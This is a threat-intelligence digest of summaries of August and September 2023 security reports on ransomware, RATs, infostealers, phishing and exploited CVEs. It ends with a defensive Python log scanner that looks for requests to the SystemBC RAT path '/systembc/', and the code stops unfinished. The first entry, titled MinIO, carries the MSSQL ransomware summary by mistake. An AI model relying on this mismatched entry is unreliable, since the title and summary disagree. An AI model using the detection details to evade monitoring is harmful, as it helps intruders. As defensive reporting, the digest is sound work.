—
- Intel Source:
- Security Joes
- Intel Name:
- Hackers_Exploiting_MinIO_Storage_System
- Date of Scan:
- 2023-09-05
- Impact:
- LOW
- Summary:
- Infected Microsoft SQL Server (MSSQL) databases were being used to deliver Cobalt Strike and ransomware payloads, according to Securonix Threat Lab research. Using MSSQL as a beachhead, the attackers deploy a variety of payloads, including remote-access Trojans (RATs) and a fresh Mimic ransomware variant named FreeWorld, after first infiltrating the target machine.
—
- Intel Name:
- Cyberattack_by_APT28_Using_msedge_as_a_Bootloader
- Date of Scan:
- 2023-09-05
- Impact:
- LOW
- Summary:
- Researchers from CERT-UA have observed a deliberate cyber attack against a crucial Ukrainian energy infrastructure site. An email message with a phony sender address and a link to an archive, like “photo.zip,” is being distributed to carry out the malicious scheme.
—
- Intel Source:
- Okta
- Intel Name:
- Okta_Warns_of_Social_Engineering_Attacks
- Date of Scan:
- 2023-09-04
- Impact:
- LOW
- Summary:
- Recent weeks have seen an increase in social engineering attacks against IT service desk staff, according to several U.S.-based Okta customers. The caller’s tactic was to persuade the service desk staff to reset all multi-factor authentication (MFA) factors enrolled by highly privileged users.
Source:
https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
—
- Intel Source:
- ASEC
- Intel Name:
- Following_the_Spread_of_Fileless_Malware_Through_Spam_Emails
- Date of Scan:
- 2023-09-04
- Impact:
- LOW
- Summary:
- A phishing campaign that spreads via spam emails and runs a PE file (EXE) without writing the file to the user’s disk has been uncovered by ASEC researchers. The malicious attachment, which uses the .hta extension, ultimately executes the malware strains AgentTesla, Remcos, and LimeRAT.
—
- Intel Source:
- Seqrite
- Intel Name:
- ZeroDay_Vulnerabilities_Detected_on_WinRAR
- Date of Scan:
- 2023-09-04
- Impact:
- MEDIUM
- Summary:
- In the widely used WinRAR software, the zero-day vulnerabilities CVE-2023-38831 and CVE-2023-40477 have been discovered. The possibility of remote code execution presented by these vulnerabilities raises serious security concerns. With half a billion users globally, WinRAR is a popular compression tool that is essential to numerous digital processes.
Source:
https://www.seqrite.com/blog/threat-advisory-zero-day-vulnerabilities-detected-on-winrar/
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- FreeWorld_Ransomware_Attacks_on_MSSQL_Databases
- Date of Scan:
- 2023-09-04
- Impact:
- MEDIUM
- Summary:
- Infected Microsoft SQL Server (MSSQL) databases were being used to deliver Cobalt Strike and ransomware payloads, according to Securonix Threat Lab research. Using MSSQL as a beachhead, the attackers deploy a variety of payloads, including remote-access Trojans (RATs) and a fresh Mimic ransomware variant named FreeWorld, after first infiltrating the target machine.
—
- Intel Source:
- Interlab
- Intel Name:
- A_new_campaign_of_novel_RAT
- Date of Scan:
- 2023-09-02
- Impact:
- LOW
- Summary:
- On 8/28/2023, Interlab obtained a sample that was sent to a journalist with highly targeted content luring the recipient to open the document. After analyzing it, Interlab discovered that, following the initial compromise, an AutoIT script was executed to perform process injection using a process hollowing technique. The injected process contained a novel RAT, which was named “SuperBear” due to naming conventions in the code.
—
- Intel Source:
- Talos
- Intel Name:
- Analyses_on_new_open_source_infostealer
- Date of Scan:
- 2023-09-02
- Impact:
- LOW
- Summary:
- In this week’s edition of the Threat Source newsletter, Talos reports seeing more and more bad actors take advantage of tools that have been added to public malware repositories, such as the infostealer “SapphireStealer,” which was analyzed by Talos researchers and shared in their blog.
Source:
https://blog.talosintelligence.com/new-open-source-infostealer-and-reflections-on-2023-so-far/
—
- Intel Source:
- Rapid7
- Intel Name:
- New_IDAT_Loader_executes_StealC_and_Lumma_Infostealers
- Date of Scan:
- 2023-09-02
- Impact:
- LOW
- Summary:
- Recently, Rapid7 discovered a Fake Browser Update campaign tricking users into executing malicious binaries. While analyzing the dropped binaries, Rapid7 determined that a new loader is utilized in order to execute infostealers, including StealC and Lumma, on compromised systems.
—
- Intel Source:
- Talos
- Intel Name:
- An_Open_Source_Info_Stealer_Named_SapphireStealer
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- In December 2022, SapphireStealer was first published by the open-source community as an information stealing malware. Since then, it’s been observed across a number of public malware repositories with increasing frequency. The researchers have moderate confidence that multiple entities are using SapphireStealer. They have separately improved and modified the original code base, extending it to support additional data exfiltration mechanisms.
Source:
https://blog.talosintelligence.com/sapphirestealer-goes-open-source/
—
- Intel Source:
- Resecurity
- Intel Name:
- The_attacks_on_USPS_and_US_Citizens_for_data_theft
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- Resecurity has discovered a large-scale smishing campaign targeting US citizens. Similar scams have been noticed before targeting FedEx and UPS. The bad actors, attributed to Chinese-speaking cybercriminals, are leveraging a package tracking text scam sent via iMessage to collect personal (PII) and payment information from the victims with the goal of identity theft and credit card fraud. The cybercriminal group behind the campaign has been named “Smishing Triad” as it leverages smishing as the main attack vector and originates from China.
Source:
https://www.resecurity.com/blog/article/smishing-triad-targeted-usps-and-us-citizens-for-data-theft
—
- Intel Source:
- Trustwave
- Intel Name:
- Malicious_PDFs
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- Over the last couple of months, Trustwave SpiderLabs analysts have noticed a spike in threat actors employing PDF documents to gain initial access through email-borne attacks. Though the use of PDF files as a malicious vector is not a novel approach, it has become more popular as threat actors continue to experiment with techniques to bypass conventional security controls.
—
- Intel Source:
- Cybergeeks
- Intel Name:
- A_detailed_analyses_of_Brute_Ratel_C4_payloads
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- Cyber Geeks published a deep-dive analysis of Brute Ratel C4 payloads. Brute Ratel C4 is a Red Team & Adversary simulation software that can be considered an alternative to Cobalt Strike.
Source:
https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Decrypting_Key_Group_Ransomware
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- EclecticIQ analysts concluded that Key Group ransomware can be classified as a low-sophistication threat. The ransomware samples contained multiple cryptographic mistakes that enabled EclecticIQ to create a decryption tool for this specific ransomware version, built on August 3, 2023. Key Group, or KEYGROUP777, is a Russian-speaking cybercrime actor focusing on financial gain by selling Personal Identifying Information (PII) or initial access to compromised devices and obtaining ransom money.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Exploitation_of_CVE_2023_38831
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- The Ukrainian government computer emergency response team CERT-UA has noted a cyberattack by the UAC-0057 group. It was discovered that the “Zbirnyk_tez_Y_23.rar” file contained an exploit for the CVE-2023-38831 vulnerability. If this exploit is successful, it will launch the BAT file “16872_16_2023_03049.pdf.cmd,” which in turn launches the LNK file “16872_16_2023_03049.lnk,” which will then use the mshta.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Taking_down_the_main_admin_of_phishing_as_a_service_16shop
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- Trend Micro has analyzed and investigated the phishing-as-a-service platform 16shop over the years. The post also covers the partnership between Trend Micro and Interpol in taking down the main administrators and servers of this massive phishing operation.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Custom_Executable_Formats_From_Hidden_Bee_to_Rhadamanthys
- Date of Scan:
- 2023-09-01
- Impact:
- LOW
- Summary:
- The design and implementation of the Hidden Bee coin miner and the Rhadamanthys stealer considerably overlap. Custom executable formats, the usage of comparable virtual filesystems, the use of LUA scripts, identical paths to some of the components, reused functions, similar use of steganography, and overall related architecture are just a few examples of the similarities that are readily apparent.
—
- Intel Source:
- SentinelOne
- Intel Name:
- A_new_wave_of_Good_Day_ransomware_attacks
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- SentinelOne researchers shared in their blog several unique Good Day ransom notes and victim portals, along with their analysis of a sample associated with a URL leading to a known Cloak extortion site. Good Day ransomware is a variant within the ARCrypter family. This new wave of Good Day attacks features individual TOR-based victim portals for each target.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_attacks_on_Adobe_ColdFusion
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- Last month, Adobe took countermeasures against the exploitation of pre-authentication remote code execution (RCE) vulnerabilities in their ColdFusion solution. FortiGuard Labs IPS telemetry data again detected numerous efforts to exploit the Adobe ColdFusion deserialization of untrusted data vulnerability, which creates a huge risk of arbitrary code execution. These attacks include probing, establishing reverse shells, and deploying malware for subsequent actions. Fortinet analysts shared their detailed analysis of how this threat group exploits the Adobe ColdFusion vulnerability.
—
- Intel Source:
- Rapid7
- Intel Name:
- The_increased_threat_activity_against_Cisco_ASA_SSL_VPN_appliances
- Date of Scan:
- 2023-08-31
- Impact:
- MEDIUM
- Summary:
- Rapid7’s managed detection and response team has discovered increased threat activity targeting Cisco ASA SSL VPN appliances (physical and virtual). In some cases, adversaries have conducted credential stuffing attacks that leveraged weak or default passwords; in others, the activity observed appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users (i.e., via MFA bypass groups).
—
- Intel Source:
- Walmart Global Tech Blog
- Intel Name:
- DGA_analysis_and_the_Gazavat_DMSniff_link
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- Gazavat, a multi-functional backdoor that shares code with the POS malware DMSniff, is also known, at least in part, as Expiro. Over the years AV companies have grouped it alongside a few other malware versions under the name Expiro, a file infector. This is a result of various malware families reusing code from the Carberp malware leak.
Source:
https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d
—
- Intel Source:
- ASEC
- Intel Name:
- Examining_Andariel_Recent_Attacking_Activities
- Date of Scan:
- 2023-08-31
- Impact:
- LOW
- Summary:
- Attacks thought to have been carried out by the Andariel group have been found by ASEC researchers. It is known that the Lazarus threat group or one of its affiliates is associated with the Andariel threat group, which typically targets Korean businesses and organizations. Since 2008, attacks on targets in Korea have been noted.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Estries_Targeting_Government_and_Technology_Sector
- Date of Scan:
- 2023-08-30
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro have uncovered a fresh cyberespionage operation by the Earth Estries hacker collective. As Earth Estries targets governments and enterprises in the technology sector, they found parallels with the advanced persistent threat (APT) group FamousSparrow after analyzing the deployed tactics, techniques, and procedures (TTPs).
—
- Intel Source:
- McAfee
- Intel Name:
- RemcosRat_Malware_Peeled_Back
- Date of Scan:
- 2023-08-30
- Impact:
- LOW
- Summary:
- Researchers from McAfee have discovered a Remcos RAT operation that uses phishing emails to distribute malicious VBS scripts. A ZIP/RAR attachment was included in a phishing email. There is a highly obfuscated VBS file inside this ZIP.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/peeling-back-the-layers-of-remcosrat-malware/
—
- Intel Source:
- Trustwave
- Intel Name:
- The_Rise_of_QR_Codes_in_Phishing
- Date of Scan:
- 2023-08-30
- Impact:
- LOW
- Summary:
- Threat actors are taking image phishing to the next level by taking advantage of QR codes, a.k.a. ‘Qishing’, to hide their malicious URLs. The samples Trustwave analysts observed using this technique are primarily disguised as Multifactor Authentication (MFA) notifications, which trick their victims into scanning the QR code with their mobile phones to gain access. However, instead of going to the target’s desired location, the QR code leads them to the threat actor’s phishing page.
—
- Intel Source:
- Secureworks
- Intel Name:
- The_actions_against_the_Qakbot_botnet
- Date of Scan:
- 2023-08-30
- Impact:
- MEDIUM
- Summary:
- On August 29, 2023, U.S. law enforcement launched a nationwide operation that disrupted the Qakbot botnet (also known as Qbot) and its associated infrastructure. Secureworks Counter Threat Unit researchers have monitored this botnet for a long time and detected the disruption activity on August 25. The initial access vector for these intrusions was a phishing email. Qakbot was one of the top malware threats, used by cybercriminals to deliver other malware such as Conti, ProLock, Egregor, REvil, MegaCortex, and Black Basta. The botnet was lucrative for the GOLD LAGOON threat group, which has operated the Qakbot malware since 2007. The threat actors reportedly received approximately $58 million in ransom payments between October 2021 and April 2023.
Source:
https://www.secureworks.com/blog/qakbot-campaign-delivered-black-basta-ransomware
—
- Intel Source:
- Aquasec
- Intel Name:
- The_exploition_of_Kinsing_Malware
- Date of Scan:
- 2023-08-30
- Impact:
- LOW
- Summary:
- Aqua Nautilus observed a new malware campaign that exploits the Openfire vulnerability (CVE-2023-32315) which deploys Kinsing malware and a cryptominer. This vulnerability leads to a path traversal attack, which grants an unauthenticated user access to the Openfire setup environment. This then allows the threat actor to create a new admin user and upload malicious plugins. Eventually the attacker can gain full control over the server.
Source:
https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability
—
- Intel Source:
- Security Affairs
- Intel Name:
- Target_on_Citrix_NetScaler_systems_in_massive_attacks
- Date of Scan:
- 2023-08-29
- Impact:
- MEDIUM
- Summary:
- Sophos X-Ops has tracked an ongoing campaign targeting Citrix NetScaler systems, conducted by threat actors linked to the FIN8 group. The hackers are exploiting the remote code execution vulnerability tracked as CVE-2023-3519 in a large-scale campaign. The flaw CVE-2023-3519 (CVSS score: 9.8) is a code injection issue that could result in unauthenticated remote code execution.
Source:
https://securityaffairs.com/150028/hacking/fin8-citrix-netscaler.html?amp=1
—
- Intel Source:
- Sophos
- Intel Name:
- Hackers_Targeting_Unpatched_Citrix_and_NetScaler_Systems
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
- A campaign by threat actors to target unpatched Citrix and NetScaler systems that are online is being monitored by Sophos X-Ops at the moment. The data shows a considerable similarity between CVE-2023-3519-based attacks that deliver malware and webshells and earlier attempts that used a lot of the same TTPs.
IOC link: https://github.com/sophoslabs/IoCs/blob/master/2023-08-25%20Citrix%20CVE-2023-3519%20attacks.csv
Source:
https://infosec.exchange/@SophosXOps/110951651051968204
—
- Intel Source:
- Phylum
- Intel Name:
- NPM_Package_Masquerading
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
- On August 24th, 2023, Phylum’s detection system observed a suspicious package published to npm called “emails-helper.” After investigating it, it was determined that this package was part of a sophisticated attack involving Base64-encoded and encrypted binaries. The scheme delivers encryption keys from a DNS TXT record hosted on a remote server. Additionally, a hex-encoded URL is retrieved from this remote server and then passed to the spawned binaries. The outcome is the deployment of powerful penetration testing tools such as dnscat2, mettle, and Cobalt Strike Beacon.
Source:
https://blog.phylum.io/npm-emails-validator-package-malware/
—
- Intel Source:
- JPCERT
- Intel Name:
- Embedding_a_malicious_Word_file_into_a_PDF_file
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
- JPCERT/CC has discovered a new technique used in a July attack, which bypassed detection by embedding a malicious Word file into a PDF file. They described the technique, “MalDoc in PDF,” in their blog and explained its details and countermeasures against it.
Source:
https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html
—
- Intel Source:
- Telekom Security
- Intel Name:
- DarkGate_Malware_Activity_Spikes
- Date of Scan:
- 2023-08-29
- Impact:
- LOW
- Summary:
- Telekom Security researchers have identified a new malspam campaign deploying an off-the-shelf malware called DarkGate. The current spike in DarkGate malware activity is plausible given that the developer of the malware has recently started to rent it out to a limited number of affiliates.
Source:
https://github.security.telekom.com/2023/08/darkgate-loader.html
—
- Intel Source:
- Ironnet
- Intel Name:
- An_increase_in_MacOS_malware_detections
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- IronNet has observed an increase in MacOS malware within IronDome’s Education sector over the past couple of weeks. Their analysts’ investigation into these incidents found that the infections originated from already-infected personal devices that were brought into education networks, with the majority occurring at higher education institutions.
Source:
https://www.ironnet.com/blog/back-to-school-reminder-keep-your-macs-clean
—
- Intel Source:
- CERT-UA
- Intel Name:
- Emails_Containing_BAT_Files_in_BZIP_GZIP_and_RAR_Archives
- Date of Scan:
- 2023-08-28
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have observed the distribution of emails with attachments in the form of BZIP, GZIP, and RAR archives containing BAT files built with the aid of the ScrubCrypt cryptor (priced from USD 249); launching these files results in the computer being infected with the AsyncRAT malicious program.
—
- Intel Source:
- Netenrich
- Intel Name:
- In_Depth_Analysis_of_ADHUBLLKA_Ransomware_Family
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- Researchers at Netenrich examined the Adhubllka ransomware, which has been targeting regular people and small businesses with ransoms ranging from $800 to $1,600 since at least January 2020.
Source:
https://netenrich.com/blog/discovering-the-adhubllka-ransomware-family
—
- Intel Source:
- Juniper
- Intel Name:
- DreamBus_Botnet_comes_back
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- Juniper Threat Labs researchers have observed multiple attacks where threat actors used a vulnerability affecting RocketMQ servers (CVE-2023-33246) to infiltrate systems and install the malicious DreamBus bot, a malware strain last seen in 2021. This vulnerability opened the door for hackers to exploit the RocketMQ platform, leading to a series of attacks. Juniper analysts shared the details of the attacks and the bot in their blog.
—
- Intel Source:
- Akamai
- Intel Name:
- IoT_Targeting_Malware_Expands_Threat_Landscape
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- The Akamai Security Intelligence Response Team (SIRT) has identified a concerning evolution in the KmsdBot malware campaign. The newly discovered Kmsdx binary marks a significant update, now focusing on targeting Internet of Things (IoT) devices. This version of the malware incorporates telnet scanning capabilities and supports a wider range of CPU architectures, expanding its attack potential. The update underscores the ongoing threat posed by vulnerable IoT devices and reinforces the critical need for continuous security measures and updates. KmsdBot’s scope encompasses private gaming servers, cloud hosting providers, and specific government and educational sites, suggesting a persistent concern for IoT security in a rapidly evolving threat landscape.
Source:
https://www.akamai.com/blog/security-research/updated-kmsdbot-binary-targeting-iot
—
- Intel Source:
- DFIR Report
- Intel Name:
- Widespread_Ransomware_is_Caused_by_HTML_Smuggling
- Date of Scan:
- 2023-08-28
- Impact:
- LOW
- Summary:
- Researchers from the DFIR report have noted that the threat actor behind the Nokoyawa Ransomware only deployed the final ransomware 12 hours after the initial intrusion. In November 2022, this threat actor used HTML smuggling to send businesses a password-protected ZIP file. An ISO file that distributed IcedID, which then used Cobalt Strike and finally Nokoyawa ransomware, was contained in the password-protected ZIP file.
Source:
https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
—
- Intel Source:
- ASEC
- Intel Name:
- Case_Studies_of_MS_SQL_Server_Proxyjacking
- Date of Scan:
- 2023-08-28
- Impact:
- MEDIUM
- Summary:
- Poorly managed MS-SQL servers have been the subject of proxyjacking attacks, according to ASEC experts. One of the primary attack methods for Windows systems is to employ publicly accessible MS-SQL servers with easy-to-guess passwords. Threat actors frequently attempt to obtain access to poorly maintained MS-SQL servers via brute force or dictionary assaults. If successful, they infect the system with malware.
—
- Intel Source:
- Trellix
- Intel Name:
- Recent_activity_of_Scattered_Spider_threat_group
- Date of Scan:
- 2023-08-26
- Impact:
- MEDIUM
- Summary:
- Trellix researchers describe in their blog the modus operandi of Scattered Spider: their recent activity, the tools they leverage, the vulnerabilities they exploit, and their impact. It also indicates that this group has started targeting other sectors, including critical infrastructure organizations. Scattered Spider is known for theft of sensitive data and leveraging trusted organizational infrastructure for follow-on attacks on downstream customers.
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_Constant_Threat_Posed_by_Remcos_RAT
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- Researchers from Cyfirma have examined an ongoing operation run by the Remcos Remote Access Trojan (RAT). The analysis reveals a highly developed threat ecosystem that makes use of a number of strategies, including malicious IP addresses, covert payloads, and complex functions that infect systems and acquire sensitive data.
Source:
https://www.cyfirma.com/outofband/the-persistent-danger-of-remcos-rat/
—
- Intel Source:
- Microsoft
- Intel Name:
- A_Chinese_threat_actor_group_Flax_Typhoon_access_Taiwanese_organizations
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- Microsoft has detected a pattern of malicious activity affecting organizations in Taiwan using techniques that could be easily reused in other operations anywhere else. Microsoft attributes this campaign to Flax Typhoon (overlaps with ETHEREAL PANDA), a nation-state actor based out of China. Flax Typhoon’s observed behavior suggests the threat actor intends to perform espionage and maintain access to organizations across a broad range of industries for as long as possible.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- The_Investigation_of_RedLine_Stealer_Spam_Campaign
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- EclecticIQ researchers have gathered samples from a RedLine stealer spam campaign that ran between April and August 2023. The campaign succeeded by distributing command and control among recently created domains hosted on IP addresses with reliable traffic, and RedLine developers provide minor iterations on previous variants.
Source:
https://blog.eclecticiq.com/redline-stealer-variants-demonstrate-a-low-barrier-to-entry-threat
—
- Intel Source:
- Talos
- Intel Name:
- Lazarus_Group_Exploits_ManageEngine_Flaw_to_Launch_QuiteRAT
- Date of Scan:
- 2023-08-25
- Impact:
- HIGH
- Summary:
- Researchers from Cisco Talos have identified the Lazarus Group as a state-sponsored actor operating against European and American healthcare organizations and internet backbone infrastructure. This is the third known effort that this actor is responsible for in less than a year, and they have all utilized the same infrastructure.
Source:
https://blog.talosintelligence.com/lazarus-quiterat/
—
- Intel Source:
- Secureworks
- Intel Name:
- Smoke_Loader_Dropping_Geolocation_Malware_And_Flimsy_Recon_WiFi_Scanning_Software
- Date of Scan:
- 2023-08-25
- Impact:
- LOW
- Summary:
- Researchers from Secureworks have seen the Smoke Loader botnet deliver a specific Wi-Fi scanning program to compromised systems. This trojan was given the name Whiffy Recon. With the help of adjacent Wi-Fi access points as a source of information, it triangulates the coordinates of the infected PCs using Google’s geolocation API.
—
- Intel Source:
- Talos
- Intel Name:
- Lazarus_Group_new_threat_CollectionRAT
- Date of Scan:
- 2023-08-25
- Impact:
- HIGH
- Summary:
- Researchers from Cisco Talos have discovered another new Lazarus Group threat called “CollectionRAT”. CollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary commands on an infected system. Cisco Talos analysts analyzed it and concluded that CollectionRAT appears to be connected to Jupiter/EarlyRAT, another malware family Kaspersky recently wrote about and attributed to Andariel, a subgroup within the Lazarus Group umbrella of threat actors.
Source:
https://blog.talosintelligence.com/lazarus-collectionrat/
—
- Intel Source:
- Zscaler
- Intel Name:
- New_Info_Stealer_Family_Named_Agniane
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- Agniane Stealer is a novel information stealer family discovered by Zscaler researchers. This malware takes credentials, system data, and session information from browsers, tokens, and file transfer tools. When Agniane Stealer acquires sensitive data, it passes it to command-and-control servers, where threat actors can act on the stolen information.
Source:
https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-webs-crypto-threat
—
- Intel Source:
- Sentinelone
- Intel Name:
- Evolution_of_Ransomware_Linux_and_ESXi_Focused_Threats
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- SentinelOne researchers have observed that ransomware tactics have evolved, with attackers now targeting Linux and VMware ESXi platforms alongside Windows. This article explores recent ransomware families like MONTI Locker, Akira Ransomware, Trigona Linux Locker, and Abyss Locker. These threats exhibit cross-platform capabilities and strategic code reuse.
—
- Intel Source:
- SOC Radar
- Intel Name:
- Raccoon_Stealer_Returns_with_New_Version
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- SOC Radar researchers have discovered that the creators of the data-stealing malware Raccoon Stealer have ended their six-month online silence. They are currently encouraging potential hackers to use the updated 2.3.0 malware (2.3.0.1 since August 15, 2023) version.
Source:
https://socradar.io/raccoon-stealer-resurfaces-with-new-enhancements/
—
- Intel Source:
- Any.Run
- Intel Name:
- Technical_Analysis_of_XWorm_Malware
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- AnyRun researchers have seen the latest version of an XWorm sample — a widespread malicious program that is advertised for sale on underground forums.
Source:
https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/
—
- Intel Source:
- Safebreach
- Intel Name:
- New_Threat_Coverage_Akira_8Base_and_Rorschach
- Date of Scan:
- 2023-08-24
- Impact:
- MEDIUM
- Summary:
- Safebreach researchers have observed that the Hacker’s Playbook Threat Coverage round-up unveils added coverage for recently identified ransomware and malware variants, including Akira ransomware, 8Base ransomware, Rorschach (BabLock) ransomware, and others. SafeBreach customers can now simulate and assess their defenses against these evolving threats using the SafeBreach Hacker’s Playbook™.
Source:
https://www.safebreach.com/resources/akira-ransomware-8base-threat-coverage/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Evolving_Malvertising_Tactics_advanced_Cloaking_Strategies
- Date of Scan:
- 2023-08-24
- Impact:
- LOW
- Summary:
- Malvertising campaigns are evolving with the adoption of advanced cloaking techniques that hinder detection and response. This article explores a recent malvertising chain that employs intricate fingerprinting, using encoded JavaScript, to assess visitor legitimacy. This escalating cyber battle underscores the challenges faced by defenders in countering these deceptive tactics.
—
- Intel Source:
- Trendmicro
- Intel Name:
- AI_Hype_Abused_in_Malicious_Facebook_Ads
- Date of Scan:
- 2023-08-23
- Impact:
- LOW
- Summary:
- Trendmicro researchers have identified that cybercriminals are capitalizing on the excitement surrounding Artificial Intelligence (AI) advancements through deceptive Facebook ads. These ads promise AI-powered advantages but instead distribute a malicious browser add-on that aims to steal victims’ credentials. By exploiting AI enthusiasm, attackers are using URL shorteners and cloud storage to spread their harmful payload.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Dropping_AgentTesla_Exotic_Excel_Files
- Date of Scan:
- 2023-08-23
- Impact:
- LOW
- Summary:
- SANS researchers observed that attackers prefer to employ more unusual file extensions to boost their chances of evading simple mail gateway rules. This time, the extension “.xlam” was used. They found multiple emails delivering .xlam files to potential victims.
Source:
https://isc.sans.edu/diary/More+Exotic+Excel+Files+Dropping+AgentTesla/30150/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Spacecolon_Deploy_Scarab_Ransomware_on_Vulnerable_Servers
- Date of Scan:
- 2023-08-23
- Impact:
- LOW
- Summary:
- ESET researchers examined Spacecolon, a modest toolset used to distribute Scarab ransomware versions to victims all around the world. It is most likely introduced into victim organisations by its operators exploiting insecure web servers or brute-forcing RDP credentials.
Source:
https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/
—
- Intel Source:
- ASEC
- Intel Name:
- APT_Attack_Patterns_Targeting_Web_Services_of_Korean_Corporations
- Date of Scan:
- 2023-08-22
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have discovered APT attacks on Korean corporate web servers. The attackers exploit vulnerabilities to infiltrate and execute malicious actions. The report covers attack techniques such as privilege escalation, credential theft, and remote control using tools like Mimikatz, Potato, and NetCat. The attackers’ objectives appear to evolve from ad insertion to potentially deploying ransomware.
—
- Intel Source:
- Cyfirma
- Intel Name:
- CraxsRAT_and_CypherRAT_Created_by_EVLF_DEV
- Date of Scan:
- 2023-08-22
- Impact:
- LOW
- Summary:
- The CYFIRMA research team has identified a new Malware-as-a-Service (MaaS) operator known as EVLF DEV. This threat actor is responsible for the development of CypherRAT and CraxsRAT, which have been purchased on a lifetime licence by over 100 different threat actors in the previous three years.
Source:
https://www.cyfirma.com/outofband/unmasking-evlf-dev-the-creator-of-cypherrat-and-craxsrat/
—
- Intel Source:
- Symantec
- Intel Name:
- Chinese_APT_Targeting_Hong_Kong_in_Supply_Chain_Attack
- Date of Scan:
- 2023-08-22
- Impact:
- LOW
- Summary:
- Symantec researchers have identified that an emerging China-backed advanced persistent threat group targeted organizations in Hong Kong in a supply chain attack that leveraged legitimate software to deploy the PlugX/Korplug backdoor.
—
- Intel Source:
- Sentinelone
- Intel Name:
- New_Variant_of_XLoader_macOS_Malware
- Date of Scan:
- 2023-08-22
- Impact:
- LOW
- Summary:
- SentinelOne researchers have observed that a new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called OfficeNote.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_WoofLocker_Tech_Support_Campaign_is_Back
- Date of Scan:
- 2023-08-21
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have discovered that the WoofLocker tech support scam scheme has returned. The tactics and procedures are fairly similar, but the infrastructure has been strengthened to withstand future takedown attempts.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/08/wooflocker2
—
- Intel Source:
- ISC.SANS
- Intel Name:
- System_BCMalware_Activity
- Date of Scan:
- 2023-08-21
- Impact:
- LOW
- Summary:
- SANS researchers analyzed a captured request for /systembc/password.php. According to public references, this path is associated with the SystemBC Remote Access Trojan (RAT). All four source IPs belong to the DigitalOcean ASN, and only one had previously been reported as likely malicious.
Source:
https://isc.sans.edu/diary/SystemBC+Malware+Activity/30138/
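The diary’s observation is a single request path, which is exactly the kind of indicator a defender can sweep web server logs for. The following is an added example, not code from the SANS diary: it parses Apache/nginx combined-format access log lines and groups matching requests by client IP. The log lines are constructed for this example, and matching the whole `/systembc/` directory rather than only `password.php` is this example’s generalization.

```python
import re
from collections import defaultdict

# Constructed combined-format lines for this example (not the diary's honeypot data).
SAMPLE_LOG = """\
203.0.113.10 - - [21/Aug/2023:10:01:02 +0000] "GET /systembc/password.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.10 - - [21/Aug/2023:10:01:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Aug/2023:10:02:09 +0000] "POST /systembc/password.php?x=1 HTTP/1.1" 404 196 "-" "python-requests/2.31"
192.0.2.44 - - [21/Aug/2023:10:03:15 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "curl/8.1"
garbage line that does not parse
"""

# Combined log format: client IP, ident, user, [timestamp], "METHOD path proto", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The diary's observed path is /systembc/password.php. Matching the whole
# /systembc/ prefix is this example's generalisation (assumption).
SUSPICIOUS_PATHS = [re.compile(r"^/systembc/", re.IGNORECASE)]


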